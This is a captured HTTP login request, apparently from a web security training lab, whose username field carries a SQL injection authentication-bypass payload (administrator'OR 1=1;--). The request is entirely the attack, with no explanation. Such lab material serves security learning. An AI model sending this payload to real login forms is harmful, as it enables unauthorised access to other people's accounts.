POST /login HTTP/1.1
Host: 0adb009704ff7ed38077305100aa00c7.web-security-academy.net
Cookie: session=m3kS7RUet6X6BrZQhlFDne0Rnr0e2ZqP
Content-Length: 90
Cache-Control: max-age=0
Sec-Ch-Ua: "Not;A=Brand";v="99", "Brave";v="139", "Chromium";v="139"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Origin: https://0adb009704ff7ed38077305100aa00c7.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0adb009704ff7ed38077305100aa00c7.web-security-academy.net/login
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

csrf=pYyaGwHZnfQlN2nxo9tbaxrfpFTD41EP&username=administrator%27OR+1%3D1%3B--&password=test
